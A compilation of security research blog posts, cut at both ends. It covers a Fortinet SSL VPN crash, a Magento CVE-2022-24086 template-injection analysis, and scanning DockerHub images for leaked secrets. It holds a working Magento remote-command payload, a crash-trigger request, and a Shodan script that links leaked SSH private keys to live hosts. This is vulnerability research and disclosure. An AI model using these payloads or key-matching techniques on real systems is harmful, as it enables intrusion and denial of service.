20: 2022-12-13 05:35:29 <01230> R08: 00007fa8b2961818   R09: 0000000002e54b8a
21: 2022-12-13 05:35:29 <01230> R10: 00007fa8b403e908   R11: 0000000000000030
22: 2022-12-13 05:35:29 <01230> R12: 00007fa8b296f858   R13: 0000000002dc090f
23: 2022-12-13 05:35:29 <01230> R14: 00007fa8b3764800   R15: 00007fa8b2961818
24: 2022-12-13 05:35:29 <01230> RSI: 00007fa8b2961440   RDI: 00007fa8b296f858
25: 2022-12-13 05:35:29 <01230> RBP: 00007fff7f4762a0   RSP: 00007fff7f4761a0
26: 2022-12-13 05:35:29 <01230> RIP: 00000000015e2f84   EFLAGS: 0000000000010286
27: 2022-12-13 05:35:29 <01230> CS:  0033   FS: 0000   GS: 0000
28: 2022-12-13 05:35:29 <01230> Trap: 000000000000000e   Error: 0000000000000004
29: 2022-12-13 05:35:29 <01230> OldMask: 0000000000000000
30: 2022-12-13 05:35:29 <01230> CR2: 0000000000000040
31: 2022-12-13 05:35:29 <01230> stack: 0x7fff7f4761a0 - 0x7fff7f4793b0 
32: 2022-12-13 05:35:29 <01230> Backtrace:
33: 2022-12-13 05:35:29 <01230> [0x015e2f84] => /bin/sslvpnd  
34: 2022-12-13 05:35:29 <01230> [0x015e3335] => /bin/sslvpnd  
35: 2022-12-13 05:35:29 <01230> [0x01586f08] => /bin/sslvpnd  
36: 2022-12-13 05:35:29 <01230> [0x01592c82] => /bin/sslvpnd  
37: 2022-12-13 05:35:29 <01230> [0x016a4c9d] => /bin/sslvpnd  

A segfault such as this would often indicate a bug exploitable for remote code execution, and so our interest was piqued. Let's take a look at the faulting code:

mov     rax, [rbp+var_F8]
mov     rdx, r15
mov     rdi, r12
mov     r9, [rbp+var_F0]
mov     rsi, [rbp+var_D8]
lea     rcx, [rbp+var_D0]
movzx   r8d, byte ptr [rax+40h] <-- crash here
call    sub_15E1F80

As you can see, we're trying to dereference the NULL pointer, and pass it to another function. In a higher-level language, such as C, the code might look like this (I've added guessed variable names to try to make things more informative):

sub_15E1F80(conn, reqInfo, helper, &var_D0, var_F8->memberAt0x40, unknown);

The NULL dereference is occurring because the var_F8 variable contains zero (you can see from the register dump above, the RAX register is, indeed, zero). But why? What should this member do, and why isn't it doing it?

Well, it's quite difficult to know for sure, given only a stripped binary. But we can make some guesses. Since var_F8 is assigned to the result of the function sub_16B8300, let's take a look at what the other callers of this function do with the result. Here's one:

    v4 = sub_16B8300(a2);
    if ( v4->memberAt0x40 )
      v7 = AF_INET6;
    else
      v7 = AF_INET;
    v9 = socket(v7, 1, 6);

It looks like the result is tested to see if it is an ipv4 socket or an ipv6 socket, and a socket is instantiated appropriately by the code. It seems likely that this function returns some kind of socket, perhaps attached to the IO of the request. Another function is more cryptic, but demonstrates the bit-twiddling that is a signature of socket and file descriptor code:

v5 = sub_16B8300(v3);
v14 = ((*(*(v5 + 80) + 112LL) >> 3) ^ 1) & 1;
*v5->memberAt0x40 = v14;

Going back to our crash itself, it's interesting to note that the crash occurs when we send a HTTP POST request to /remote/portal/bookmarks containing no data payload. This would seem to align with our 'IO of the request' theory - if the POST request has a Content-Length of zero, the socket may be closed before the handler gets a chance to run.

It is somewhat alarming that the crash is so easy to trigger, although we are somewhat relieved to report that authentication as a VPN user is required before this endpoint is accessible. Additionally, the results of a more involved analysis, carried out by watchTowr engineers, indicate that exploitation is limited to this denial-of-service condition and does not permit code execution.
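To illustrate just how trivial the trigger is, the sketch below reconstructs the shape of the offending request: an authenticated POST to the bookmarks endpoint with a zero-length body. This is intentionally not a weaponised proof-of-concept - the host and session value are placeholders, and the SVPNCOOKIE cookie name is our assumption about the relevant session token.

```python
# A minimal sketch (not a weaponised PoC): the shape of the request that
# triggers the crash - an authenticated POST to /remote/portal/bookmarks
# with a zero-length body. The host and session value are placeholders,
# and SVPNCOOKIE is assumed to be the relevant session cookie.
def build_trigger_request(host: str, session_cookie: str) -> str:
    return (
        "POST /remote/portal/bookmarks HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: SVPNCOOKIE={session_cookie}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )

print(build_trigger_request("vpn.example.com", "PLACEHOLDER"))
```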

However, one could easily imagine a disgruntled employee running a script to repeatedly crash the SSLVPN process - or, worse yet, an attacker trying to prevent access to an environment in order to hinder the response to another cyber security incident - both scenarios rendering the VPN unusable for the entire workforce. While it's not as bad as the world-ending remote-code-execution bugs we've seen lately (and indeed, that were released as this post was in the final stages of being drafted), it's still a worrisome bug.

When I say this bug is 'worrisome', I mean this on more than one level. On the surface, of course, it allows adversaries to crash a system service. But it is also worrisome in its pure simplicity.

A Trend

It would be nice if we could say that discovering this bug was a one-in-a-million chance, or that it required the skill of a thousand 'Thought Leaders' - but this just isn't the case based on our experience thus far.

The fact that we discovered this bug while hunting for details of a separate bug does not inspire confidence in the target, and the simplicity of the bug trigger is alarming. While we usually shy away from remarking on a vendor's internal development processes due to the inherent lack of visibility we have, it is very difficult to resist in this case. This does seem very much like the kind of 'textbook' condition that could be discovered very easily by anyone with a basic HTTP fuzzer, which raises serious questions about how much assurance Fortinet is really in a position to provide to its userbase. Bugs are an inevitable fact of life, but at least some bugs should not make it to production.

It is, of course, risky for an outside organisation such as ours to make such statements about the internal practices of a software development house. There may be some mitigating reason why this bug wasn't detected earlier, perhaps some complexity hidden within the SDLC which we are hitherto unaware of. However, even if that were the case, we find it difficult to imagine how simple end-to-end HTTP fuzzing would fail to locate a bug like this before a release to production.

One way we can get a further glimpse into Fortinet's practices is by sifting through their release notes. Taking a cursory look reveals some truly alarming bugs - my personal favourite was "WAD crash with signal 11 caused by a stack allocated buffer overflow when parsing Huffman-encoded HTTP header name if the header length is more than 256 characters". It is difficult to imagine a scenario in which that doesn't yield a serious security issue, yet Fortinet don't go into details, and we were unable to locate any security advisory related to this bug, which means that for many people it has gone unnoticed. I imagine the kind of threat actors who are specifically interested in routing platforms comb these release notes, looking for easy quick-wins, exploitable n-day bugs which administrators are not aware of.

Another way to evaluate how seriously Fortinet takes this issue is in their response to it. Fortinet were given the industry-standard 90-day grace period to patch the issue, with an additional extension granted to allow them to fit into their regular release cycle. However, not only did Fortinet neglect to release a fixed version of the 7.2 branch, but the release notes for fixed versions of the 7.0 and 7.4 branches (7.0.11 and 7.4.0) don't appear to mention the bug at all, leaving those users who haven't read this watchTowr blog in the dark as to the urgency of an upgrade.

Conclusion

It is very easy, as a security researcher, to blame software vendors for poor security practices or the presence of 'shallow' bugs. Security is just one component in a modern software development lifecycle, and it is a fact of life that some bugs will inevitably "slip through the 'net" (you see what I did there?) and make it into production software. This is just the nature of software development. Consequently, we try very hard to avoid casting blame - software development is difficult.

However, there is a limit to how far back we will push our sense of responsibility to the wider Internet. When vendors have bugs this shallow, this frequently, this is perhaps cause for alarm - and when bugs are buried in release notes, there is serious cause for concern - all in our opinion. The only thing worse than finding out that your firewall is vulnerable to a remote RCE is not finding out.

Fortinet and The Accidental Bug
It was not, indeed, fine

Being the responsible people we are, we also notified Fortinet of this discovery in accordance with our VDP.

Fortinet were prompt in their confirmation of the bug, and released fixes for two of the three branches of FortiGuard that they maintain - the bug is fixed in versions 7.0.11 and 7.4.0. The FortiGuard team then requested that we extend our usual 90-day release window until 'the end of May' to allow them to release a fix for the 7.2 branch, version 7.2.5, a proposal which watchTowr accepted. However, this release has not materialised, and as such there is currently no released fix for the 7.2 branch. Those who operate such devices are advised to restrict SSL VPN use to trusted users if at all possible - hardly an acceptable workaround, in our opinion.

Here at watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

Timeline

Date Detail
13th February 2023 Initial disclosure to vendor, vendor acknowledges receipt
2nd March 2023 Follow-up email to vendor
2nd March 2023 Vendor replies that they are working on the issue, and cannot provide a specific date but will keep watchTowr informed as the fix progresses
3rd April 2023 Inform vendor that watchTowr has adopted an industry-standard 90-day disclosure window, request that they release a fix before this window expires
5th April 2023 Vendor replies that a fix has already been developed and released for version 7.0.11 of FortiGuard. Vendor also reveals that a fix has been developed for versions 7.2.5 and 7.4.0, due to be released 'end of May' and 'end of April' respectively. Vendor requests that we delay disclosure until 'end of May' to align with their release schedule; watchTowr agrees
31st May 2023 Disclosure deadline; watchTowr requests that vendor shares CVE and/or 'Bug ID' identifiers to aid clients in tracking the issue
31st May 2023 Vendor requests additional time to develop fix, watchTowr does not agree

DISCLAIMER: This blogpost contains the personal opinions and perspectives of the author. The views expressed in this blogpost are solely those of the author and do not necessarily reflect the opinions or positions of any other individuals, organizations, or entities mentioned or referenced herein.

The information provided in this blogpost is for general informational purposes only. It is not intended to provide professional advice, or conclusions of internal software development processes or security posture. All opinions have been inferred from the experiences of the author.

Adobe Commerce (Magento) CVE-2022-24086 : Return Of The Text Interpolation

10 April 2023 at 14:35

In our latest blog post, we'll be discussing a vulnerability that - while not new - is shrouded in mystery, with everything from bizarre and false PoCs circulating on Twitter to incomplete analysis scattered across dark corners of the web.

As part of our Attack Surface Management capabilities delivered through the watchTowr Platform, we conduct a thorough analysis of vulnerabilities in technology that are likely to be prevalent across our clients' attack surfaces. This allows us to quickly identify and validate vulnerable systems across large attack surfaces, enabling us to respond rapidly to potential threats.

The vulnerability we'll be discussing today has been formally identified as 'CVE-2022-24086', a vulnerability in Adobe Commerce (or as it is also known, Magento).

Regular readers might remember a previous post on the topic of the Text4Shell bug (and subsequent follow-up), where we talked about string interpolation and how it can be leveraged to achieve code execution. Today's post speaks of another problem caused, at the root, by the same thing - unsafe string interpolation.

CVE-2022-24086 is an "Improper Input Validation Vulnerability" in Adobe Commerce 2.4.3-p1, as advised by MITRE. If abused and exploited correctly, it allows remote code execution without any user interaction; worse, Adobe advise that they are aware of in-the-wild exploitation. Clearly a pretty serious bug.

Adobe Commerce is a hugely popular e-commerce platform. While on the surface, it appears simple - a CMS with some added cart/checkout functionality - the truth is that it is a large, complex application, allowing advanced operations such as templating items based on properties, management of multiple sites, and a particularly comprehensive customisation and templating engine.

But How Does It Work?

This customisation engine allows almost everything imaginable, from changing text elements on the website all the way to writing custom plugins. To see how it works, we can simply take a look at some of the default pages, which use the engine extensively. I picked vendor/magento/theme-frontend-luma/Magento_Email/email/footer.html which contains a simple example:

<p class="address">
	{{var store.formatted_address|raw}}
</p>
A simple variable substitution

When we look at the webpage, we see the formatted store address. Magento has processed the line inside the curly braces, and produced some output.

While this is a simple example, the language used for this customisation is surprisingly complex (see the documentation) and allows for an almost limitless range of behaviour beyond simple text substitution. Typically, though, this functionality is not exposed to end-users directly - rather, site staff use the templating engine to configure the store itself. For example, a salesperson could devise an email template to be sent to prospective buyers, and use variable substitution to insert the particulars of the recipient along with a product they may be interested in.

There are a few exceptions to this 'staff-only' rule, however, and this is where things start to get interesting, as they allow an unprivileged attacker to make use of the templating engine.

One such exception is in the 'Wishlist' module, which is designed to allow an end-user of the store to create a list of items they wish for, which can then be shared via email. What makes it interesting to us is one seemingly-minor detail - the templating engine runs on the outgoing email before it is sent. Let's explore this functionality a little more.

But Why?

Firstly, we'll do a simple variable substitution. We create a wishlist on a Magento site, and then request that the wishlist is shared via email to an address we control. Since we can specify the body of the email, we'll set it to hello {{var store.frontend_name}} world. Let's see what's actually sent in the email:

root@host:/# postcat -qb 85FC5CBD35| grep hello
m test test:</h3>=0A            hello Main Website Store world=0A      =20=

As any astute reader can see, the injected variable was substituted with the name of the store - "Main Website Store".

This confirms we've got access to the system templating engine as a non-administrative user. But what can we do with it? Well, maybe we could experiment and see if we could read out sensitive information such as database credentials. But why? Why limit ourselves? It turns out we can set our sights even higher than this, due to the (perhaps unintended?) power of the templating engine.

Arbitrary Code Execution

As you'll recall from previous mentions of string interpolation bugs, the 'smoking gun' that really enables useful exploitation is the ability to execute arbitrary commands from an interpolated value. This is at the core of any bug in this class, and CVE-2022-24086 is no different, although slightly more complicated to figure out.

The functionality hinges on two functions exposed to the templating engine - getTemplateFilter and addAfterFilterCallback. The first will allow us to get a reference to a 'filter' object, which is used to transform incoming data before processing, and the second allows us to attach a PHP function to it (!). This is intended to be used by plugin developers to sanitise and transform user input, deferring processing to PHP code either in the Magento application itself or an administrator-provided PHP-language plugin.

It's actually easier to demonstrate this than it is to explain it, so here's a quick example:

{{var this.getTemplateFilter().filter('test')}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(touch${IFS}/tmp/test)}}
Note the use of the ${IFS} shell variable to avoid whitespace in the argument.

This will obtain a reference to a filter named 'test', and then attach a callback to it, instructing it to execute the PHP 'system' function with the argument 'touch /tmp/test'. Running this query yields evidence that our command has executed on the server:

root@host:/bitnami/magento# ls /tmp/test -l
-rw-rw-r-- 1 daemon daemon 0 Feb 26 21:07 /tmp/test

Good news for attackers, bad news for defenders.

In the real world, this is much more nefarious - within the watchTowr Platform, we deliver a second-stage payload - and the bad guys out there could be delivering reverse shells. Indeed, this is what we've seen when the bug is exploited in the wild.

It's worth noting that the 'wishlist' module is not the only module to expose the templating engine to untrusted users. We've noted that across our client base, and in attacks seen in-the-wild, exploitation is usually best aimed at the checkout process rather than the 'wishlist' module - perhaps since the wishlist might not be present on all installations?

Fingerprinting EOL'ed installations

For many people, this is the end of the story - the bug has been analysed, a PoC has been created, and we have a good understanding of what's going on. But for us here at watchTowr, the story is just beginning - we secure our clients and detect exploitable deployments of Adobe Commerce before they are exploited, which means we must detect at scale as rapidly as possible.

While we are not here to arm everyone, there are trivially identifiable exploitable instances, such as those running End-Of-Life versions of Magento. Since no patch is available, these installations are almost certainly vulnerable.

As a demonstration, let's take a look at some hosts on the Internet and see how we can detect these EOL'ed versions, and also look at the kind of version distribution we see.

We start off with a quick Shodan search for the X-Magento-Vary header, which Magento helpfully emits on every HTTP response. This search detects 12,500 Magento installs, and to keep things manageable, we'll confine our work to the first 1000.

The obvious solution is to observe the Magento version number, but Magento makes this very difficult to do. Rather than reveal the full version of the software (such as 1.2.3p4), Magento exposes only the major and minor versions. This is done via the /magento_version endpoint. While this is not a high level of detail, it allows us to quickly detect instances running 2.3 and below (at the time of writing, anything below 2.4.4 is EOL).
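As a rough illustration, the major.minor check might be sketched as follows. Note that the response body format shown ("Magento/2.3 (Community)") is an assumption about what the version endpoint returns, and the EOL threshold reflects the time of writing; fetching the body over HTTP is left to your client of choice.

```python
import re

def parse_magento_version(body: str):
    """Extract (major, minor) from an assumed 'Magento/X.Y (...)' response body."""
    m = re.search(r"Magento/(\d+)\.(\d+)", body)
    return (int(m.group(1)), int(m.group(2))) if m else None

def is_definitely_eol(version) -> bool:
    # At the time of writing, anything below the 2.4 branch is EOL.
    return version is not None and version < (2, 4)

print(parse_magento_version("Magento/2.3 (Community)"))  # (2, 3)
print(is_definitely_eol((2, 3)))                         # True
```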

Adobe Commerce (Magento) CVE-2022-24086 : Return Of The Text Interpolation

Note that since this is a single HTTP response, it is very easy for us to scale (for example, via a Nuclei template).

Running this on our 1000 hosts gives the following breakdown:

  • Magento/2.1: 12 (1.2%)
  • Magento/2.2: 40 (4%)
  • Magento/2.3: 212 (21%)
  • Magento/2.4: 302 (30%)
  • Other: 566 (56%)

Our single request has quickly determined that a whopping 25% of hosts are running an outdated version of Magento and require further attention.

The remaining 75% of installations aren't necessarily safe, however. As I mentioned, versions below 2.4.4 are (at the time of writing) EOL. A number of hosts running these versions may be hiding in the 30% of hosts which report "Magento/2.4".

Magento is very averse to revealing this information, however, and so we are forced to turn to more 'sneaky tricks' - in this case, fingerprinting static resources. After some investigation, we found that one change introduced in 2.4.4 is the upgrade of the tinymce package from version 4 to version 5. This seemingly-unrelated change is actually very easy to detect - we can simply request the tinymce static resource (/static/adminhtml/Magento/backend/en_US/tiny_mce_5/tinymce.min.js), and if it is not present, we know that the host is running a version lower than 2.4.4, and is thus EOL'd. Let's take a look at how these versions are present on our 1000-host sample:

  • tinymce 4 present (probably < 2.4.4): 415 hosts (41%)
  • tinymce 5 present (probably >= 2.4.4): 230 hosts (23%)
  • None present (indeterminate): 355 (35%)

This has found a further 41% of our hosts which are running EOL'd software - a finding that should almost certainly concern their owners.
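The classification logic behind this breakdown can be sketched as below. The tiny_mce_5 path is from the post; the tiny_mce_4 path is a guessed analogue, and how the HTTP presence checks (e.g. 200 vs 404) are performed is elided.

```python
# Classify a host by which tinymce static resource its static tree serves.
# TINYMCE5 is the path given in the post; TINYMCE4 is a guessed analogue.
TINYMCE5 = "/static/adminhtml/Magento/backend/en_US/tiny_mce_5/tinymce.min.js"
TINYMCE4 = "/static/adminhtml/Magento/backend/en_US/tiny_mce_4/tinymce.min.js"  # assumed path

def classify(has_tinymce4: bool, has_tinymce5: bool) -> str:
    """Map observed resource presence to a probable version bucket."""
    if has_tinymce5:
        return "probably >= 2.4.4"
    if has_tinymce4:
        return "probably < 2.4.4 (EOL)"
    return "indeterminate"

print(classify(has_tinymce4=True, has_tinymce5=False))  # probably < 2.4.4 (EOL)
```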

Conclusion

This kind of 'interpolation' bug is interesting from a technical standpoint, but is also often difficult to detect in real-world codebases. This instance is particularly damaging due to its pre-auth exploitability and the huge installation base of Adobe Commerce - combined with the valuable data such platforms typically hold.

We took a look at the bug itself, showing how it can be exploited (and, by extension, how you can confirm if your hosts are vulnerable). While we used the 'Wishlist' functionality as an attack vector, in-the-wild attacks use the more generic 'Checkout' functionality.

Finally, we've also demonstrated how to perform a fast sweep of the public Internet, and found that around a whopping 40% of hosts are running outdated software. Hopefully, they are honeypots and not production instances!

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

What Does This Key Open? - Docker Container Images (4/4)

23 February 2023 at 02:22

This post is the fourth part of a series on our recent adventures into DockerHub. Before you read it, you may be interested in the previous instalments, which are:

-

If you recall our previous posts, so far we've achieved quite a lot - we've found a way to fetch a large amount of data from DockerHub efficiently, worked out how to store it in a proper relational database, and ended up with over 30 million files which we now need to scan for sensitive information.

This is no easy task at this scale. In this post, we'll talk about how we went about this task, mutating open-source software to build our own secret discovery engine. We'll then talk about the thousands of secrets that we found, and share some insights into exactly where the secrets were exposed - because well, it seems everyone does this.

As you will likely gather throughout this exercise, we began to conclude that our findings were limited only by our imagination.

For anyone wondering - no, we won't be sharing actual secrets in this blogpost.

Leveraging Gitleaks

Our secret discovery engine is based on the open-source tool Gitleaks. This provides a great basis for our work - it's designed to run on developer workstations, and integrate with Git to scan source code for secret tokens a developer may otherwise inadvertently commit to a shared source control system. It can also operate on flat files, without Git integration.

It has some neat features - for example, it is able to recognise the structure of many access tokens (such as AWS access keys, which always begin with four characters specifying their type). It also measures the entropy of potential secrets, which is useful for finding secure secrets that have been generated randomly while ignoring false positives such as '1111111'.
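The entropy measure in question is the standard Shannon entropy; a minimal sketch is below (Gitleaks' actual implementation and thresholds may differ, so treat this as illustrative only).

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character of the string s."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

print(shannon_entropy("1111111"))              # 0.0 - obvious filler, safely ignored
print(shannon_entropy("AKIAIOSFODNN7EXAMPLE")) # higher - worth flagging
```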

However, it is clear that the software was not designed with our specific scenario (batch scanning of millions of files) in mind.

We ran into some trivial problems when first exploring - for example, invoking Gitleaks with a commandline similar to the following:

$ gitleaks detect --no-git --source /files/file1 --source /files/file2

While I expected this command to scan both files specified, the actual behaviour was to scan only the final file specified, ignoring the first! Fortunately, Gitleaks is open source, and so modifying it within our architecture to handle collections of files, archives, and more wasn't a problem.

A second problem, this time impacting performance, rears its head when Gitleaks detects a large number of secrets. Gitleaks keeps a slice and appends detected secrets to it, but for very large numbers of secrets, this approach causes high CPU load and memory fragmentation, so it is best to preallocate this slice.

With these tweaks, we're ready to use our mutated Gitleaks-based engine to find secrets. We created a table in the database for holding results for our analysis, and used a number of ec2 nodes to fill it.

What Does This Key Open? - Docker Container Images (4/4)
Properly-configured artifact scanning is very CPU intensive

Falsely Positive

Of course, when dealing with a fileset of this size, false positives are an inevitability. These fall into two main categories.

Firstly, tokens which are clearly not intended for production use. For example, the python crypto package ships with tests which use static keys. These keys are, for our purposes, 'well known', and should not be included in our output. While it is tempting to ignore these completely, we store them in the database, but mark them as 'well known'. This allows us to build a dictionary of 'well known' secrets for future projects.

Secondly, various items of text will be detected by Gitleaks despite being clearly not access keys. For example, consider the following C code:

unsigned char* key = "ASCENDING";

Gitleaks ships with a module that would classify this as a secret token, since it is assigned to a value named key.

We decided to mitigate both of these categories using filters on the name of the file in question. While Gitleaks includes functionality to do this, our use of a database and the one-to-many relationship between files and filenames complicates things, and so we use Python to match filenames after scanning.

Filename Ignore-Listing

Since a large number of files are being ignored, and because we wanted fine-grained control over them, we were careful when designing the system that assesses whether a given filename is 'well known' or not.

We decided on a file format for holding regular expressions with entries similar to the following:

  -
   pattern: .*/vendor/lcobucci/jwt/test/unit/Signer/RsaTest\.php
   mustmatch:
     - /var/www/html/vendor/lcobucci/jwt/test/unit/Signer/RsaTest.php

Here, we can see a pattern which is matched, and we can also see a test string in the 'mustmatch' array. Before analysis is started, the regular expression is tested against this test string, and if no match is found, an error is raised. While not helpful for simple expressions like the one shown, this is invaluable when attempting more complex patterns:

 -
   pattern: .*?/(lib(64)?/python[0-9\.]*/(site|dist)-packages/|.*\.egg/)Cryptodome/SelfTest/(Cipher|PublicKey|Signature)(/__pycache__)?/(test_pkcs1_15|test_import_RSA|test_import_ECC|test_pss)(\.cpython-[0-9]*)?\.(pyc|py)
   mustmatch:
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/Cipher/test_pkcs1_15.pyc
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/PublicKey/test_import_RSA.pyc
     - /galaxy_venv/lib/python2.7/site-packages/Cryptodome/SelfTest/PublicKey/test_import_ECC.pyc
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/Signature/test_pkcs1_15.pyc
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/Signature/test_pss.py
     - /usr/local/lib/python3.7/site-packages/Cryptodome/SelfTest/Cipher/__pycache__/test_pkcs1_15.cpython-37.pyc
     - /usr/local/lib/python3.6/dist-packages/pycryptodomex-3.9.8-py3.6-linux-x86_64.egg/Cryptodome/SelfTest/Signature/test_pss.py

In addition, separate tests ensure 'true positive' detections occur, by scanning known-interesting files and ensuring that a detection is raised appropriately.
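The self-validating ignore-list described above can be sketched as follows. The entry format mirrors the YAML shown earlier; the function and variable names are our own, and the real system (which works against a database) is more involved.

```python
import re

def load_ignore_list(entries):
    """Compile ignore-list entries, validating each pattern against its
    'mustmatch' examples before any scanning begins."""
    compiled = []
    for entry in entries:
        pattern = re.compile(entry["pattern"])
        for example in entry.get("mustmatch", []):
            if not pattern.fullmatch(example):
                raise ValueError(f"pattern {entry['pattern']!r} failed to match {example!r}")
        compiled.append(pattern)
    return compiled

def is_well_known(filename, compiled_patterns):
    return any(p.fullmatch(filename) for p in compiled_patterns)

# The sample entry from the post, expressed as a Python dict:
entries = [{
    "pattern": r".*/vendor/lcobucci/jwt/test/unit/Signer/RsaTest\.php",
    "mustmatch": ["/var/www/html/vendor/lcobucci/jwt/test/unit/Signer/RsaTest.php"],
}]
rules = load_ignore_list(entries)
print(is_well_known("/var/www/html/vendor/lcobucci/jwt/test/unit/Signer/RsaTest.php", rules))  # True
```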

Context-Aware Ignore-Listing

While filename-based ignoring is a great help, there are a few specific instances where it falls short. For example, text similar to the following appears often in dmesg output:

[    0.630554] Loaded X.509 cert 'Magrathea: Glacier signing key: 00a5a65759de474bc5c43120880c1b94a539f431'

Gitleaks will helpfully alert us to this, believing the key to be sensitive information. In reality, it is simply a fingerprint, and useless to an attacker. Since there are many keys in use, it is impractical to list every one we are not interested in, and so we use a regex to isolate the secret and ensure it does not occur in these strings:

regex:
  -
    pattern: ".*Loaded( X\\.509)? cert '.*: (?P<secret>.*)'"
    mustmatch:
     - "Mar 08 12:58:16 localhost kernel: Loaded X.509 cert 'Red Hat Enterprise Linux kpatch signing key: 4d38fd864ebe18c5f0b72e3852e2014c3a676fc8'"
     - "MODSIGN: Loaded cert 'Oracle America, Inc.: Ksplice Kernel Module Signing Key: 09010ebef5545fa7c54b626ef518e077b5b1ee4c'"

Note the use of a named capture group - named 'secret' - which is compared to the secret that Gitleaks detects. If this expression matches, the detection is considered 'well known'.
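A minimal sketch of this context-aware check (the helper and its name are illustrative; the real logic lives in our modified Gitleaks):

```python
import re

# Each ignore-context isolates the flagged value in a named group 'secret';
# a detection is considered 'well known' when the value Gitleaks flagged is
# exactly what that group captures.
IGNORE_CONTEXTS = [
    re.compile(r".*Loaded( X\.509)? cert '.*: (?P<secret>.*)'"),
]

def is_well_known(line, detected_secret):
    for pattern in IGNORE_CONTEXTS:
        match = pattern.match(line)
        if match and match.group("secret") == detected_secret:
            return True
    return False

line = ("[    0.630554] Loaded X.509 cert "
        "'Magrathea: Glacier signing key: 00a5a65759de474bc5c43120880c1b94a539f431'")
print(is_well_known(line, "00a5a65759de474bc5c43120880c1b94a539f431"))  # True
```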

SSH Keypairs

One datapoint with a low false-positive rate and high impact is the number of SSH private keys found in publicly accessible DockerHub repositories. Since our mutated engine recognises these, identifying them is easy (although some work must be done to remove example keys).

We locate a very large number of these files - 54169, to be exact:

+-----------------------------------+----------+-------------------------+
| description                       | count(*) | count(distinct(secret)) |
+-----------------------------------+----------+-------------------------+
| Private Key                       |    54169 |                    9693 |
+-----------------------------------+----------+-------------------------+

But many of them are of no consequence. Taking a look at the filenames, for example, we can immediately discard 2329 self-signed CA files:

mysql> select filename, count(*) from gitleaksArtifacts 	\
	where Description = "Private Key"						\
    group by filename 										\
    order by count(*) desc 									\
    limit 10;
+-----------------------+----------+
| filename              | count(*) |
+-----------------------+----------+
| rsa.2028.priv         |     2745 |
| ssl-cert-snakeoil.key |     2329 |
| server.key            |     1972 |
| http_signing.md       |     1488 |
| pass2.dsa.1024.priv   |     1350 |
| ssh_host_rsa_key      |     1219 |
| ssh_host_dsa_key      |     1063 |
| ssh_host_ecdsa_key    |     1016 |
| ssh_host_ed25519_key  |      897 |
| server1.key           |      805 |
+-----------------------+----------+

The presence of files prefixed with ssh_host, however, is interesting, as such host keys are considered sensitive. Let's look at them more closely:

mysql> select filename, count(*) from gitleaksArtifacts \
	where Description = "Private Key"  					\
    and filename like 'ssh_host_%_key' 					\
    group by filename 									\
    order by count(*);
+-----------------------+----------+
| filename              | count(*) |
+-----------------------+----------+
| ssh_host_ecdsa521_key |        1 |
| ssh_host_ecdsa256_key |        1 |
| ssh_host_ecdsa384_key |        1 |
| ssh_host_ed25519_key  |      897 |
| ssh_host_ecdsa_key    |     1016 |
| ssh_host_dsa_key      |     1063 |
| ssh_host_rsa_key      |     1219 |
+-----------------------+----------+

These 4198 files, spanning 611 distinct images, should probably not be exposed to the public. However, we can take things one step further, and verify whether any hosts on the public Internet are using these keys.

Enter: Shodan

You may be familiar with Shodan.io, which gathers a wealth of banner information from various services exposed to the public Internet. One feature it provides is the ability to search by fingerprint hash, which we can calculate easily from the private keys we fetched above.

Shodan provides a straightforward API, so our key-locating application is simple to write. Most of the code is concerned with manipulating private keys to derive the corresponding public key, and thus the hash.

import base64
import binascii
import hashlib
import ipaddress
import re

import shodan
from Crypto.PublicKey import RSA  # PyCryptodome

shodanInst = shodan.Shodan('<your API key here>')

for artifact in db.fetchGitleaksArtifacts():
	if artifact.description != 'Private Key':
		continue
	try:
		# Strip the PEM armour and decode the raw key material.
		keyAsc = artifact.secret
		keyAsc = re.sub(r"\s*?-*(BEGIN|END).*?PRIVATE KEY-*\s*?", "", keyAsc)
		keyAsc = keyAsc.replace('"', "")
		keyBinary = base64.b64decode(keyAsc)
		keyPriv = RSA.importKey(keyBinary)
	except (binascii.Error, ValueError):
		# Not a parseable RSA key - skip it.
		continue

	# Export the public half to OpenSSH format, snip off the
	# 'ssh-rsa' prefix, and b64-decode it.
	keyPublic = keyPriv.publickey()
	pubKeyBytes = base64.b64decode(
		keyPublic.exportKey('OpenSSH').split(b' ')[1]
	)

	# We can then hash this value to find the key hash: the MD5 of
	# the raw key bytes, rendered colon-separated.
	pubHash = hashlib.md5(pubKeyBytes).digest()
	pubHashStr = ":".join(f"{x:02x}" for x in pubHash)

	# Now we can do the actual search.
	result = shodanInst.search(f'Fingerprint: {pubHashStr}')
	for svc in result['matches']:
		db.insertArtifactSighting(
			artifact.fileid,
			str(ipaddress.ip_address(svc['ip']))
		)

This query yields very interesting results, although not what we expected. We see 742 matches over 690 unique IP addresses, but what is most interesting is the specific keys they use:

mysql> select concat(artifact_path.path, '/', artifacts.filename), 	\
	count(distinct(ipaddress)) 										\
	from artifactsOnline 											\
	join artifacts on artifacts.id = artifactsOnline.fileid 		\
	join artifact_path on artifact_path.id = artifacts.pathid 		\
	join artifactHashes on artifactHashes.id = artifacts.hashID 	\
	where path not like '/pentest/exploitation%' 					\
	group by concat(artifact_path.path, '/', artifacts.filename) 	\
	order by count(distinct(ipaddress));
+-------------------------------------------------------------------------------------------+----------------------------+
| concat(artifact_path.path,  '/', artifacts.filename)                                      | count(distinct(ipaddress)) |
+-------------------------------------------------------------------------------------------+----------------------------+
| /etc/ssh/ssh_host_rsa_key                                                                 |                         27 |
| /usr/local/lib/python2.6/dist-packages/bzrlib/tests/stub_sftp.pyc                         |                         23 |
| /usr/lib64/python2.7/site-packages/bzrlib/tests/stub_sftp.pyo                             |                         23 |
| /usr/lib/python2.7/site-packages/bzrlib/tests/stub_sftp.py                                |                         23 |
